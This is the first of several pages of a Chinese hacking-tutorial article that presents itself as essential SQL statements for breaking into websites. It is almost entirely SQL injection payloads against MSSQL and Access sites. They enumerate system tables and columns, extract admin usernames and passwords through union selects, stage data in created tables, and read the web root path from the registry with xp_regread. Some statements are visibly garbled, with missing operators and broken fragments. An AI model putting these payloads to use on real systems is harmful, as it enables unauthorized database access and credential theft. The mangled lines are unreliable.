WEB开发网
开发学院网络安全黑客技术 入侵网站必备Sql语句:(经典语句) 阅读

入侵网站必备Sql语句:(经典语句)

 2008-10-27 16:51:14 来源:WEB开发网   
核心提示: and 0 (select top1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) 来得到其他的表,and 0(select count(*) from bbs.dbo.sysobjects wher

and 0 (select top

1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) 来得到其他的表。

and 0(select count(*) from bbs.dbo.sysobjects where xtype=U and

name=admin

and uid>(str (id))) 暴到UID的数值假设为18779569 uid=id

and

0(select top 1 name from bbs.dbo.syscolumns where id=18779569)

得到一个admin的一个字段,假设为 user_id

and 0(select top 1 name from

bbs.dbo.syscolumns where id=18779569 and name not in

(id,...)) 来暴出其他的字段

and 0_id from BBS.dbo.admin where username>1)

可以得到用户名

依次可以得到密码。。。。。假设存在user_id username ,password 等字段

and 0(select count(*) from master.dbo.sysdatabases where
name>1 and dbid=6)
and 0 (select top 1 name from
bbs.dbo.sysobjects where xtype=U) 得到表名
and 0(select top 1 name from
bbs.dbo.sysobjects where xtype=U and name not in(Address))
and
0(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin
and uid>(str(id))) 判断id值
and 0(select top 1 name from
BBS.dbo.syscolumns where id=773577794) 所有字段
?id=-1 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select
1,2,3,4,5,6,7,8, *,9,10,11,12,13 from admin (union,access也好用)
得到WEB路径

;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1
swappass from swap)=1--
;CREATE TABLE newtable(id int IDENTITY(1,1),paths
varchar(500)) Declare @test varchar(20) exec master..xp_regread
@rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEMCurrentControlSet
ServicesW3SVCParametersVirtual Roots, @value_name=/, values=@test
OUTPUT insert into paths (path) values(@test)--
;use ku1;--
;create

上一页  1 2 3 4 5 6 7 8 9  下一页

Tags:入侵 网站 必备

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接